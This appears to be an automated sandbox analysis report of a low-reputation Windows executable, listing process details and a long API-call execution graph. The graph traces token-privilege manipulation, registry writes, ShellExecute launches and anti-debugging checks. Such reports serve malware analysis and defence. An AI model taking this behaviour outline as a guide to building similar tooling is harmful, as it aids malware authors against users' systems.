                                                              Start date:20/09/2024
                                                              Path:C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe"
                                                              Imagebase:0x400000
                                                              File size:6'453'568 bytes
                                                              MD5 hash:C8E8EEAF5464AF1A188B3DC12C890813
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:6
                                                              Start time:06:00:49
                                                              Start date:20/09/2024
                                                              Path:C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe"
                                                              Imagebase:0x400000
                                                              File size:6'453'568 bytes
                                                              MD5 hash:C8E8EEAF5464AF1A188B3DC12C890813
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:3%
                                                                Dynamic/Decrypted Code Coverage:94.4%
                                                                Signature Coverage:22%
                                                                Total number of Nodes:929
                                                                Total number of Limit Nodes:19
                                                                execution_graph 52758 2470000 52760 2470005 52758->52760 52763 2470031 52760->52763 52775 2470b11 GetPEB 52763->52775 52766 2470b11 GetPEB 52767 24702a6 52766->52767 52768 247049a GetNativeSystemInfo 52767->52768 52771 247002c 52767->52771 52769 24704c7 VirtualAlloc 52768->52769 52768->52771 52770 24704e0 52769->52770 52777 1000bcc4 52770->52777 52776 247029a 52775->52776 52776->52766 52778 1000bcd4 52777->52778 52779 1000bccf 52777->52779 52892 1000bbce 52778->52892 52900 1001006c GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 52779->52900 52782 2470a47 52782->52771 52783 1000324b 52782->52783 52784 1000326a _memset __write_nolock 52783->52784 52785 100033d0 Sleep 52784->52785 52786 100034dc _memset 52785->52786 52787 100034f6 Sleep 52786->52787 52788 10003604 _memset 52787->52788 52981 1000b19b GetSystemTimeAsFileTime 52788->52981 52790 10003624 52983 1000b06c 52790->52983 52792 1000362b _memset 52986 1000b07e 52792->52986 52794 1000364f 52795 1000368b _memset 52794->52795 52796 1000b07e _rand 38 API calls 52794->52796 52797 100036e7 wsprintfA 52795->52797 52796->52794 52798 10003723 _memset 52797->52798 52799 1000374d Sleep 52798->52799 52989 1000c4a0 52799->52989 52802 1000378c _memset 52803 100037d3 wsprintfA 52802->52803 52804 10003814 _memset 52803->52804 52805 1000382c Sleep 52804->52805 52806 1000c4a0 _memset 52805->52806 52807 10003865 wsprintfA 52806->52807 52808 1000389d _memset 52807->52808 52809 100038b5 Sleep 52808->52809 52810 1000c4a0 _memset 52809->52810 52811 100038e9 wsprintfA 52810->52811 52812 10003921 _memset 52811->52812 52991 100028b9 52812->52991 52815 10003975 52816 100028b9 49 API calls 52815->52816 52817 10003993 Sleep 52816->52817 52817->52815 52818 100039a8 52817->52818 52819 100028b9 49 API calls 52818->52819 52820 100039c6 Sleep 52819->52820 52820->52818 52821 100039db 52820->52821 52822 1000b19b __time64 GetSystemTimeAsFileTime 52821->52822 52823 100039e1 52822->52823 52824 1000b06c 38 API calls 52823->52824 52825 100039e8 _memset 52824->52825 52826 1000b07e _rand 38 API calls 52825->52826 52827 10003a22 _memset 52825->52827 52826->52825 52999 1000518c 52827->52999 52829 10003ae2 53006 10005166 52829->53006 52832 1000518c 45 API calls 52833 10003b17 52832->52833 52834 1000518c 45 API calls 52833->52834 52835 10003b32 52834->52835 52836 1000518c 45 API calls 52835->52836 52837 10003b52 52836->52837 52838 1000518c 45 API calls 52837->52838 52839 10003b72 52838->52839 53009 10009824 52839->53009 52841 10003b86 53041 10002d6b CreateFileA GetFileSize 52841->53041 52843 10003ba3 Sleep Sleep 52844 10003bd7 _memset 52843->52844 53050 1000a77d 52844->53050 52846 10003bf4 _memset 53054 1000b0dd 52846->53054 52849 10003c76 53063 100018ea 52849->53063 52852 10003c80 53227 10002388 68 API calls 3 library calls 52852->53227 52853 10003cac 52855 10003cb5 52853->52855 52856 10003e5d GlobalAddAtomA 52853->52856 53229 10002e12 10 API calls 52855->53229 52870 10003e84 52856->52870 52857 10003c8d Sleep 53228 10002388 68 API calls 3 library calls 52857->53228 52859 10003ca7 52860 10003e5c 52859->52860 52860->52856 52862 10003df4 52863 10003e05 Sleep 52862->52863 52864 10003e1c 52862->52864 53230 10002e12 10 API calls 52863->53230 53231 10002f95 CLRCreateInstance SafeArrayAccessData SafeArrayUnaccessData SysAllocString __EH_prolog3 52864->53231 52867 100043d7 Sleep Sleep 52867->52870 52868 10003e49 52868->52856 53232 10001144 78 API calls 4 library calls 52868->53232 52870->52867 53224 1000b46f 52870->53224 52872 100043f2 RegOpenKeyExA 52878 100042ff _memset 52872->52878 52873 10004456 Sleep 52873->52878 52888 100042fd 52873->52888 52874 10004422 RegSetValueExA RegCloseKey 52874->52878 52876 1000432f LoadLibraryA 52876->52878 52877 10004380 GetProcAddress 52877->52867 52877->52878 52878->52873 52878->52874 52878->52876 52878->52877 52879 100043bd ShellExecuteA 52878->52879 52879->52867 52880 10003ec9 _memset 52881 1000a77d _mbstowcs 42 API calls 52880->52881 52882 1000416d _memset 52881->52882 52883 1000b0dd _strcat_s 38 API calls 52882->52883 52884 1000426c FindWindowExA 52883->52884 52884->52872 52885 10004289 52884->52885 53233 10001030 10 API calls 2 library calls 52885->53233 52887 100042a4 Sleep CoInitializeEx 52887->52888 52889 100042bf CoCreateInstance 52887->52889 52888->52878 53234 10002388 68 API calls 3 library calls 52888->53234 52890 100042e1 52889->52890 52891 100042f7 CoUninitialize 52889->52891 52890->52891 52891->52888 52893 1000bbda _doexit 52892->52893 52897 1000bc77 _doexit 52893->52897 52898 1000bc27 ___DllMainCRTStartup 52893->52898 52901 1000ba6a 52893->52901 52895 1000bc57 52896 1000ba6a __CRT_INIT@12 83 API calls 52895->52896 52895->52897 52896->52897 52897->52782 52898->52895 52898->52897 52899 1000ba6a __CRT_INIT@12 83 API calls 52898->52899 52899->52895 52900->52778 52902 1000ba76 _doexit 52901->52902 52903 1000baf8 52902->52903 52904 1000ba7e 52902->52904 52906 1000bb59 52903->52906 52907 1000bafe 52903->52907 52953 1000e748 HeapCreate 52904->52953 52908 1000bbb7 52906->52908 52909 1000bb5e 52906->52909 52913 1000bb1c 52907->52913 52921 1000ba87 _doexit 52907->52921 52963 1000b49b 38 API calls _doexit 52907->52963 52908->52921 52979 1000e312 41 API calls __freefls@4 52908->52979 52968 1000e02b TlsGetValue 52909->52968 52910 1000ba83 52912 1000ba8e 52910->52912 52910->52921 52954 1000e380 45 API calls 4 library calls 52912->52954 52918 1000bb30 52913->52918 52964 1000fae7 39 API calls _free 52913->52964 52967 1000bb43 40 API calls __mtterm 52918->52967 52921->52898 52923 1000ba93 __RTC_Initialize 52930 1000baa3 GetCommandLineA 52923->52930 52946 1000ba97 52923->52946 52924 1000bb26 52965 1000e05f 40 API calls _free 52924->52965 52925 1000bb6f 52925->52921 52928 1000bb7b RtlDecodePointer 52925->52928 52931 1000bb90 52928->52931 52929 1000bb2b 52966 1000e766 HeapDestroy 52929->52966 52956 1000fe6b 41 API calls 2 library calls 52930->52956 52934 1000bb94 52931->52934 52935 1000bbab 52931->52935 52972 1000e09c 38 API calls 4 library calls 52934->52972 52973 1000ac51 52935->52973 52936 1000bab3 52957 1000f8a2 45 API calls __calloc_crt 52936->52957 52940 1000bb9b GetCurrentThreadId 52940->52921 52941 1000ba9c 52941->52921 52942 1000babd 52943 1000bac1 52942->52943 52959 1000fdb0 50 API calls 3 library calls 52942->52959 52958 1000e05f 40 API calls _free 52943->52958 52955 1000e766 HeapDestroy 52946->52955 52947 1000bacd 52948 1000bae1 52947->52948 52960 1000fb3a 49 API calls 6 library calls 52947->52960 52948->52941 52962 1000fae7 39 API calls _free 52948->52962 52951 1000bad6 52951->52948 52961 1000b298 45 API calls 4 library calls 52951->52961 52953->52910 52954->52923 52955->52941 52956->52936 52957->52942 52958->52946 52959->52947 52960->52951 52961->52948 52962->52943 52963->52913 52964->52924 52965->52929 52966->52918 52967->52921 52969 1000e040 RtlDecodePointer TlsSetValue 52968->52969 52970 1000bb63 52968->52970 52969->52970 52971 1000f808 38 API calls _calloc 52970->52971 52971->52925 52972->52940 52974 1000ac85 __dosmaperr 52973->52974 52975 1000ac5c RtlFreeHeap 52973->52975 52974->52941 52975->52974 52976 1000ac71 52975->52976 52980 1000d5b3 38 API calls __getptd_noexit 52976->52980 52978 1000ac77 GetLastError 52978->52974 52979->52921 52980->52978 52982 1000b1cb __aulldiv 52981->52982 52982->52790 53235 1000e1c9 52983->53235 52987 1000e1c9 __getptd 38 API calls 52986->52987 52988 1000b083 52987->52988 52988->52794 52990 10003767 wsprintfA 52989->52990 52990->52802 52994 100028c6 _memset __write_nolock 52991->52994 52993 10002a5e Sleep 52993->52812 52993->52815 52998 10002a36 52994->52998 53266 1000a25f 52994->53266 52996 10002b07 _memset 52997 10002bae CreateFileA WriteFile FlushFileBuffers CloseHandle 52996->52997 52996->52998 52997->52998 53258 1000a501 52998->53258 53000 100051a4 52999->53000 53001 100051d4 53000->53001 53002 100051bb 53000->53002 53324 1000539c 45 API calls std::_Xinvalid_argument 53001->53324 53313 1000522d 53002->53313 53005 100051d2 53005->52829 53007 1000522d 45 API calls 53006->53007 53008 10003afc 53007->53008 53008->52832 53010 10009833 __EH_prolog3_GS 53009->53010 53329 10009c60 53010->53329 53012 10009872 53336 10008ddd 53012->53336 53014 10009892 53015 100098a0 wsprintfA 53014->53015 53016 100098ce 53014->53016 53021 10009bed OutputDebugStringA 53015->53021 53019 100098e5 53016->53019 53346 10008352 53016->53346 53023 10009bc1 53019->53023 53024 10009903 53019->53024 53035 10009c0d 53021->53035 53390 1000972c 47 API calls 53023->53390 53388 10008ef0 39 API calls _free 53024->53388 53028 10009909 wsprintfA 53028->53021 53031 10008e86 51 API calls 53040 10009930 53031->53040 53033 10009bb7 53389 1000a1f1 39 API calls 2 library calls 53033->53389 53035->52841 53036 10009ce1 45 API calls 53036->53040 53037 1000518c 45 API calls 53037->53040 53040->53019 53040->53031 53040->53033 53040->53036 53040->53037 53353 1000afa4 53040->53353 53370 1000976d 53040->53370 53375 10009d5b 53040->53375 53384 10008ec1 53040->53384 53042 1000a25f 45 API calls 53041->53042 53043 10002da0 ReadFile 53042->53043 53044 10002dc9 CloseHandle 53043->53044 53047 10002dbd 53043->53047 53045 1000a25f 45 API calls 53044->53045 53046 10002dda 53045->53046 53765 10002c08 CreateFileA 53046->53765 53047->53044 53049 10002dfe 53049->52843 53051 1000a78b 53050->53051 53781 1000a61b 53051->53781 53053 1000a7a2 53053->52846 53055 1000b0f2 53054->53055 53057 1000b0eb 53054->53057 53806 1000d5b3 38 API calls __getptd_noexit 53055->53806 53057->53055 53059 1000b120 53057->53059 53060 10003c59 FindWindowExA 53059->53060 53808 1000d5b3 38 API calls __getptd_noexit 53059->53808 53060->52849 53060->52880 53062 1000b0f7 53807 1000d561 11 API calls __cftof2_l 53062->53807 53809 10001772 GetCurrentProcess OpenProcessToken 53063->53809 53068 10001926 OpenProcess 53069 1000191e 53068->53069 53070 1000193b OpenProcessToken 53068->53070 53073 100017fe 10 API calls 53069->53073 53071 10001951 CloseHandle 53070->53071 53072 1000195c AdjustTokenPrivileges 53070->53072 53071->53069 53080 100019a0 53072->53080 53207 10001994 53072->53207 53074 10001bbd 53073->53074 53075 10001bc6 OpenProcess 53074->53075 53076 10001e4b 53074->53076 53075->53076 53079 10001bdf OpenProcessToken 53075->53079 53078 100017fe 10 API calls 53076->53078 53081 10001e55 53078->53081 53082 10001c03 AdjustTokenPrivileges 53079->53082 53083 10001bf5 CloseHandle 53079->53083 53089 100019be 53080->53089 53827 100018a0 6 API calls CatchGuardHandler 53080->53827 53084 100020e3 53081->53084 53085 10001e5e OpenProcess 53081->53085 53082->53076 53093 10001c3f 53082->53093 53083->53076 53086 100017fe 10 API calls 53084->53086 53085->53084 53087 10001e77 OpenProcessToken 53085->53087 53090 100020ed 53086->53090 53091 10001e9b AdjustTokenPrivileges 53087->53091 53092 10001e8d CloseHandle 53087->53092 53100 100019dd 53089->53100 53828 100018a0 6 API calls CatchGuardHandler 53089->53828 53095 10002376 53090->53095 53096 100020f6 OpenProcess 53090->53096 53091->53084 53104 10001ed7 53091->53104 53092->53084 53105 10001c5d 53093->53105 53841 100018a0 6 API calls CatchGuardHandler 53093->53841 53097 1000a501 CatchGuardHandler 5 API calls 53095->53097 53096->53095 53098 1000210f OpenProcessToken 53096->53098 53101 10002386 53097->53101 53102 10002133 AdjustTokenPrivileges 53098->53102 53103 10002125 CloseHandle 53098->53103 53108 100019fc 53100->53108 53829 100018a0 6 API calls CatchGuardHandler 53100->53829 53101->52852 53101->52853 53102->53095 53112 1000216f 53102->53112 53103->53095 53113 10001ef5 53104->53113 53855 100018a0 6 API calls CatchGuardHandler 53104->53855 53110 10001c7c 53105->53110 53842 100018a0 6 API calls CatchGuardHandler 53105->53842 53116 10001a1b 53108->53116 53830 100018a0 6 API calls CatchGuardHandler 53108->53830 53118 10001c9b 53110->53118 53843 100018a0 6 API calls CatchGuardHandler 53110->53843 53120 1000218d 53112->53120 53869 100018a0 6 API calls CatchGuardHandler 53112->53869 53117 10001f14 53113->53117 53856 100018a0 6 API calls CatchGuardHandler 53113->53856 53124 10001a3a 53116->53124 53831 100018a0 6 API calls CatchGuardHandler 53116->53831 53127 10001f33 53117->53127 53857 100018a0 6 API calls CatchGuardHandler 53117->53857 53128 10001cba 53118->53128 53844 100018a0 6 API calls CatchGuardHandler 53118->53844 53126 100021ac 53120->53126 53870 100018a0 6 API calls CatchGuardHandler 53120->53870 53132 10001a59 53124->53132 53832 100018a0 6 API calls CatchGuardHandler 53124->53832 53135 100021cb 53126->53135 53871 100018a0 6 API calls CatchGuardHandler 53126->53871 53136 10001f52 53127->53136 53858 100018a0 6 API calls CatchGuardHandler 53127->53858 53133 10001cd9 53128->53133 53845 100018a0 6 API calls CatchGuardHandler 53128->53845 53140 10001a78 53132->53140 53833 100018a0 6 API calls CatchGuardHandler 53132->53833 53143 10001cf8 53133->53143 53846 100018a0 6 API calls CatchGuardHandler 53133->53846 53141 100021ea 53135->53141 53872 100018a0 6 API calls CatchGuardHandler 53135->53872 53142 10001f71 53136->53142 53859 100018a0 6 API calls CatchGuardHandler 53136->53859 53148 10001a97 53140->53148 53834 100018a0 6 API calls CatchGuardHandler 53140->53834 53150 10002209 53141->53150 53873 100018a0 6 API calls CatchGuardHandler 53141->53873 53151 10001f90 53142->53151 53860 100018a0 6 API calls CatchGuardHandler 53142->53860 53152 10001d17 53143->53152 53847 100018a0 6 API calls CatchGuardHandler 53143->53847 53156 10001ab6 53148->53156 53835 100018a0 6 API calls CatchGuardHandler 53148->53835 53160 10002228 53150->53160 53874 100018a0 6 API calls CatchGuardHandler 53150->53874 53157 10001faf 53151->53157 53861 100018a0 6 API calls CatchGuardHandler 53151->53861 53158 10001d36 53152->53158 53848 100018a0 6 API calls CatchGuardHandler 53152->53848 53164 10001ad5 53156->53164 53836 100018a0 6 API calls CatchGuardHandler 53156->53836 53166 10001fce 53157->53166 53862 100018a0 6 API calls CatchGuardHandler 53157->53862 53167 10001d55 53158->53167 53849 100018a0 6 API calls CatchGuardHandler 53158->53849 53165 10002247 53160->53165 53875 100018a0 6 API calls CatchGuardHandler 53160->53875 53172 10001af4 53164->53172 53837 100018a0 6 API calls CatchGuardHandler 53164->53837 53175 10002266 53165->53175 53876 100018a0 6 API calls CatchGuardHandler 53165->53876 53176 10001fed 53166->53176 53863 100018a0 6 API calls CatchGuardHandler 53166->53863 53173 10001d74 53167->53173 53850 100018a0 6 API calls CatchGuardHandler 53167->53850 53180 10001b13 53172->53180 53838 100018a0 6 API calls CatchGuardHandler 53172->53838 53182 10001d93 53173->53182 53851 100018a0 6 API calls CatchGuardHandler 53173->53851 53184 10002285 53175->53184 53877 100018a0 6 API calls CatchGuardHandler 53175->53877 53181 1000200c 53176->53181 53864 100018a0 6 API calls CatchGuardHandler 53176->53864 53188 10001b32 53180->53188 53839 100018a0 6 API calls CatchGuardHandler 53180->53839 53191 1000202b 53181->53191 53865 100018a0 6 API calls CatchGuardHandler 53181->53865 53192 10001db2 53182->53192 53852 100018a0 6 API calls CatchGuardHandler 53182->53852 53190 100022a4 53184->53190 53878 100018a0 6 API calls CatchGuardHandler 53184->53878 53196 10001b52 GetLengthSid SetTokenInformation 53188->53196 53840 100018a0 6 API calls CatchGuardHandler 53188->53840 53204 100022c3 53190->53204 53879 100018a0 6 API calls CatchGuardHandler 53190->53879 53202 1000204a 53191->53202 53866 100018a0 6 API calls CatchGuardHandler 53191->53866 53203 10001dd1 53192->53203 53853 100018a0 6 API calls CatchGuardHandler 53192->53853 53196->53207 53199 10001b51 53199->53196 53205 10002069 53202->53205 53867 100018a0 6 API calls CatchGuardHandler 53202->53867 53206 10001df1 GetLengthSid SetTokenInformation 53203->53206 53854 100018a0 6 API calls CatchGuardHandler 53203->53854 53214 100022e2 53204->53214 53880 100018a0 6 API calls CatchGuardHandler 53204->53880 53215 10002089 GetLengthSid SetTokenInformation 53205->53215 53868 100018a0 6 API calls CatchGuardHandler 53205->53868 53212 10001e41 53206->53212 53207->53069 53211 10001df0 53211->53206 53212->53076 53213 10002301 53220 10002321 GetLengthSid SetTokenInformation 53213->53220 53882 100018a0 6 API calls CatchGuardHandler 53213->53882 53214->53213 53881 100018a0 6 API calls CatchGuardHandler 53214->53881 53219 100020d9 53215->53219 53218 10002088 53218->53215 53219->53084 53222 10002371 53220->53222 53222->53095 53223 10002320 53223->53220 53883 1000b32f 53224->53883 53226 1000b480 53226->52872 53227->52857 53228->52859 53229->52862 53230->52864 53231->52868 53232->52860 53233->52887 53234->52888 53240 1000e150 GetLastError 53235->53240 53237 1000e1d1 53238 1000b076 53237->53238 53255 1000b4aa 38 API calls 3 library calls 53237->53255 53238->52792 53241 1000e02b ___set_flsgetvalue 3 API calls 53240->53241 53242 1000e167 53241->53242 53243 1000e1bd SetLastError 53242->53243 53244 1000e16f 53242->53244 53243->53237 53256 1000f808 38 API calls _calloc 53244->53256 53246 1000e17b 53246->53243 53247 1000e183 RtlDecodePointer 53246->53247 53248 1000e198 53247->53248 53249 1000e1b4 53248->53249 53250 1000e19c 53248->53250 53252 1000ac51 _free 34 API calls 53249->53252 53257 1000e09c 38 API calls 4 library calls 53250->53257 53254 1000e1ba 53252->53254 53253 1000e1a4 GetCurrentThreadId 53253->53243 53254->53243 53256->53246 53257->53253 53259 1000a509 53258->53259 53260 1000a50b IsDebuggerPresent 53258->53260 53259->52993 53278 10011bae 53260->53278 53263 1000c5e7 SetUnhandledExceptionFilter UnhandledExceptionFilter 53264 1000c604 __call_reportfault 53263->53264 53265 1000c60c GetCurrentProcess TerminateProcess 53263->53265 53264->53265 53265->52993 53270 1000b4c8 53266->53270 53268 1000b4ec 53268->52996 53270->53268 53274 1000b4ee std::exception::exception 53270->53274 53279 1000ac8b 53270->53279 53296 1000e997 RtlDecodePointer 53270->53296 53271 1000b52c 53298 1000a8bd 38 API calls std::exception::operator= 53271->53298 53273 1000b536 53299 1000bce7 RaiseException 53273->53299 53274->53271 53297 1000c403 44 API calls __cinit 53274->53297 53277 1000b547 53278->53263 53280 1000ad08 53279->53280 53285 1000ac99 53279->53285 53308 1000e997 RtlDecodePointer 53280->53308 53282 1000aca4 53282->53285 53300 1000e94f 38 API calls 2 library calls 53282->53300 53301 1000e7a0 38 API calls 7 library calls 53282->53301 53302 1000b217 53282->53302 53283 1000ad0e 53309 1000d5b3 38 API calls __getptd_noexit 53283->53309 53285->53282 53287 1000acc7 RtlAllocateHeap 53285->53287 53290 1000acf4 53285->53290 53294 1000acf2 53285->53294 53305 1000e997 RtlDecodePointer 53285->53305 53287->53285 53289 1000ad00 53287->53289 53289->53270 53306 1000d5b3 38 API calls __getptd_noexit 53290->53306 53307 1000d5b3 38 API calls __getptd_noexit 53294->53307 53296->53270 53297->53271 53298->53273 53299->53277 53300->53282 53301->53282 53310 1000b1ec GetModuleHandleW 53302->53310 53305->53285 53306->53294 53307->53289 53308->53283 53309->53289 53311 1000b200 GetProcAddress 53310->53311 53312 1000b210 ExitProcess 53310->53312 53311->53312 53314 10005248 53313->53314 53315 1000523e 53313->53315 53317 10005270 53314->53317 53318 10005258 53314->53318 53325 1000a1f1 39 API calls 2 library calls 53315->53325 53328 1000539c 45 API calls std::_Xinvalid_argument 53317->53328 53326 10005332 39 API calls 2 library calls 53318->53326 53321 10005264 53327 10005332 39 API calls 2 library calls 53321->53327 53323 1000526e 53323->53005 53324->53005 53325->53314 53326->53321 53327->53323 53328->53323 53330 10009c79 53329->53330 53331 10009c6f 53329->53331 53392 10009eb3 45 API calls 2 library calls 53330->53392 53391 10005332 39 API calls 2 library calls 53331->53391 53334 10009c77 53334->53012 53335 10009c86 53335->53012 53337 10008de9 __EH_prolog3 53336->53337 53393 1000b4c8 53337->53393 53340 10008e09 53405 100082d0 53340->53405 53344 1000b4c8 45 API calls 53345 10008e24 53344->53345 53345->53014 53544 1000b61b 53346->53544 53349 10008e86 53350 10008ea2 53349->53350 53351 10008e9b 53349->53351 53350->53351 53566 1000839b 53350->53566 53351->53040 53354 1000afb0 _doexit 53353->53354 53355 1000afd3 __stbuf 53354->53355 53356 1000afbe 53354->53356 53633 1000ead7 39 API calls __lock 53355->53633 53631 1000d5b3 38 API calls __getptd_noexit 53356->53631 53358 1000afc3 53632 1000d561 11 API calls __cftof2_l 53358->53632 53361 1000afe5 __stbuf 53634 1000eb74 38 API calls 4 library calls 53361->53634 53362 1000afce _doexit 53362->53040 53364 1000aff7 __stbuf 53635 1000c82b 63 API calls 10 library calls 53364->53635 53366 1000b00f __stbuf 53636 1000ec10 61 API calls __flush 53366->53636 53368 1000b020 53637 1000b038 RtlLeaveCriticalSection RtlLeaveCriticalSection __stbuf _wprintf 53368->53637 53373 10009779 __EH_prolog3_GS 53370->53373 53372 1000981c 53372->53040 53373->53372 53374 10009e0b 45 API calls 53373->53374 53638 1000b9ad 53373->53638 53374->53373 53376 10009d67 __EH_prolog3 53375->53376 53377 10009d9c 53376->53377 53378 10009d76 53376->53378 53379 10009d8e 53377->53379 53644 10009e5c 45 API calls std::_Xinvalid_argument 53377->53644 53378->53379 53643 10009e5c 45 API calls std::_Xinvalid_argument 53378->53643 53382 10009dbc 53379->53382 53383 10005166 45 API calls 53379->53383 53382->53040 53383->53382 53385 10008ec8 53384->53385 53386 10008ecf 53384->53386 53385->53040 53386->53385 53645 10008a7e 53386->53645 53388->53028 53389->53023 53390->53028 53391->53334 53392->53335 53395 1000b4d2 53393->53395 53394 1000ac8b _malloc 38 API calls 53394->53395 53395->53394 53396 10008df3 53395->53396 53401 1000b4ee std::exception::exception 53395->53401 53414 1000e997 RtlDecodePointer 53395->53414 53396->53340 53413 1000827b 45 API calls 53396->53413 53398 1000b52c 53416 1000a8bd 38 API calls std::exception::operator= 53398->53416 53400 1000b536 53417 1000bce7 RaiseException 53400->53417 53401->53398 53415 1000c403 44 API calls __cinit 53401->53415 53404 1000b547 53406 100082d9 53405->53406 53411 1000832a 53405->53411 53407 100082df GetCurrentDirectoryA 53406->53407 53406->53411 53408 100082f6 53407->53408 53418 1000752c CreateFileA 53408->53418 53411->53344 53411->53345 53413->53340 53414->53395 53415->53398 53416->53400 53417->53404 53419 10007565 SetFilePointer 53418->53419 53420 1000755b 53418->53420 53421 1000b4c8 45 API calls 53419->53421 53420->53411 53424 100078a8 53420->53424 53422 10007581 53421->53422 53422->53420 53423 100075a1 SetFilePointer 53422->53423 53423->53420 53425 100078c4 _memset 53424->53425 53448 100078bd 53424->53448 53454 10007777 53425->53454 53429 10007926 53432 10007955 53429->53432 53481 100076d1 ReadFile 53429->53481 53430 100078f9 53437 100078fd 53430->53437 53471 1000770d 53430->53471 53435 100079d0 53432->53435 53483 100076d1 ReadFile 53432->53483 53485 100075b7 CloseHandle 53435->53485 53436 10007942 53436->53432 53482 100076d1 ReadFile 53436->53482 53437->53429 53480 100076d1 ReadFile 53437->53480 53440 100079d8 53443 100079dd 53440->53443 53441 10007971 53441->53435 53447 1000770d ReadFile 53441->53447 53444 1000ac8b _malloc 38 API calls 53443->53444 53445 10007a07 53444->53445 53486 10007c48 53445->53486 53449 10007996 53447->53449 53448->53411 53449->53435 53450 1000770d ReadFile 53449->53450 53451 100079a2 53450->53451 53451->53435 53484 100076d1 ReadFile 53451->53484 53453 100079b2 53453->53435 53453->53443 53455 100075d8 SetFilePointer 53454->53455 53456 1000778e 53455->53456 53457 100077a5 SetFilePointer 53456->53457 53458 100077ba 53456->53458 53460 10007792 53456->53460 53457->53458 53459 1000ac8b _malloc 38 API calls 53458->53459 53463 100077e4 53459->53463 53460->53437 53466 100075d8 53460->53466 53461 10007897 53462 1000ac51 _free 38 API calls 53461->53462 53462->53460 53463->53460 53463->53461 53464 100075d8 SetFilePointer 53463->53464 53491 10007637 53463->53491 53464->53463 53467 10007614 53466->53467 53469 100075de 53466->53469 53467->53430 53468 10007601 SetFilePointer 53468->53467 53469->53468 53470 1000760c 53469->53470 53470->53430 53494 10007697 53471->53494 53474 10007730 53476 10007697 ReadFile 53474->53476 53478 10007748 53474->53478 53475 10007697 ReadFile 53475->53474 53476->53478 53477 10007760 53477->53437 53478->53477 53479 10007697 ReadFile 53478->53479 53479->53477 53480->53429 53481->53436 53482->53432 53483->53441 53484->53453 53485->53440 53487 10007c52 53486->53487 53488 10007c4d 53486->53488 53497 10007a25 53487->53497 53488->53448 53492 10007647 ReadFile 53491->53492 53493 1000765e 53491->53493 53492->53493 53493->53463 53495 10007637 ReadFile 53494->53495 53496 100076ab 53495->53496 53496->53474 53496->53475 53498 10007a41 53497->53498 53532 10007a39 53497->53532 53499 100075d8 SetFilePointer 53498->53499 53500 10007a50 53499->53500 53501 1000770d ReadFile 53500->53501 53502 10007a54 53500->53502 53501->53502 53535 100076d1 ReadFile 53502->53535 53504 10007a8b 53536 100076d1 ReadFile 53504->53536 53506 10007aa1 53537 100076d1 ReadFile 53506->53537 53508 10007ab4 53538 100076d1 ReadFile 53508->53538 53510 10007ac7 53511 1000770d ReadFile 53510->53511 53512 10007ada 53511->53512 53513 1000770d ReadFile 53512->53513 53514 10007b34 53513->53514 53515 1000770d ReadFile 53514->53515 53516 10007b46 53515->53516 53517 1000770d ReadFile 53516->53517 53518 10007b58 53517->53518 53539 100076d1 ReadFile 53518->53539 53520 10007b6a 53540 100076d1 ReadFile 53520->53540 53522 10007b7d 53541 100076d1 ReadFile 53522->53541 53524 10007b90 53542 100076d1 ReadFile 53524->53542 53526 10007ba3 53543 100076d1 ReadFile 53526->53543 53528 10007bb6 53529 1000770d ReadFile 53528->53529 53530 10007bc9 53529->53530 53531 1000770d ReadFile 53530->53531 53533 10007bdb 53531->53533 53532->53448 53533->53532 53534 10007637 ReadFile 53533->53534 53534->53532 53535->53504 53536->53506 53537->53508 53538->53510 53539->53520 53540->53522 53541->53524 53542->53526 53543->53528 53547 1000b548 53544->53547 53546 1000836a 53546->53019 53546->53349 53554 1000a594 53547->53554 53550 1000b580 _memset _strncpy 53550->53546 53552 1000b575 53563 1000d561 11 API calls __cftof2_l 53552->53563 53555 1000a5a7 53554->53555 53556 1000a5f4 53554->53556 53557 1000e1c9 __getptd 38 API calls 53555->53557 53556->53550 53562 1000d5b3 38 API calls __getptd_noexit 53556->53562 53558 1000a5ac 53557->53558 53560 1000a5d4 53558->53560 53564 1000dfa0 38 API calls 6 library calls 53558->53564 53560->53556 53565 1000d81f 40 API calls 6 library calls 53560->53565 53562->53552 53563->53550 53564->53560 53565->53556 53567 100083cd 53566->53567 53585 100083f2 53566->53585 53572 100083e3 53567->53572 53567->53585 53615 10008215 53567->53615 53568 1000a501 CatchGuardHandler 5 API calls 53570 1000892c 53568->53570 53570->53351 53571 1000845e 53574 1000848b 53571->53574 53621 10007c7d 53571->53621 53572->53571 53573 10007c48 2 API calls 53572->53573 53572->53585 53573->53571 53576 10007a25 2 API calls 53574->53576 53577 100084a7 53576->53577 53592 10007cce 53577->53592 53580 100075d8 SetFilePointer 53581 100084e8 53580->53581 53582 1000b4c8 45 API calls 53581->53582 53581->53585 53583 10008501 53582->53583 53584 10007637 ReadFile 53583->53584 53587 10008520 53584->53587 53585->53568 53586 1000b79f 40 API calls 53586->53587 53587->53585 53587->53586 53588 100085c0 53587->53588 53589 1000b61b __fassign 40 API calls 53588->53589 53590 100085cf SystemTimeToFileTime LocalFileTimeToFileTime 53589->53590 53590->53585 53593 100075d8 SetFilePointer 53592->53593 53594 10007cfc 53593->53594 53595 10007d00 53594->53595 53596 1000770d ReadFile 53594->53596 53595->53580 53595->53585 53597 10007d13 53596->53597 53626 100076d1 ReadFile 53597->53626 53599 10007d3a 53627 100076d1 ReadFile 53599->53627 53601 10007d4d 53628 100076d1 ReadFile 53601->53628 53603 10007d60 53604 1000770d ReadFile 53603->53604 53605 10007d93 53604->53605 53606 1000770d ReadFile 53605->53606 53607 10007da5 53606->53607 53608 1000770d ReadFile 53607->53608 53609 10007dd4 53608->53609 53610 1000770d ReadFile 53609->53610 53611 10007e03 53610->53611 53629 100076d1 ReadFile 53611->53629 53613 10007e32 53630 100076d1 ReadFile 53613->53630 53616 10008223 53615->53616 53617 10008228 53615->53617 53616->53572 53617->53616 53618 10008255 53617->53618 53619 1000ac51 _free 38 API calls 53617->53619 53620 1000ac51 _free 38 API calls 53618->53620 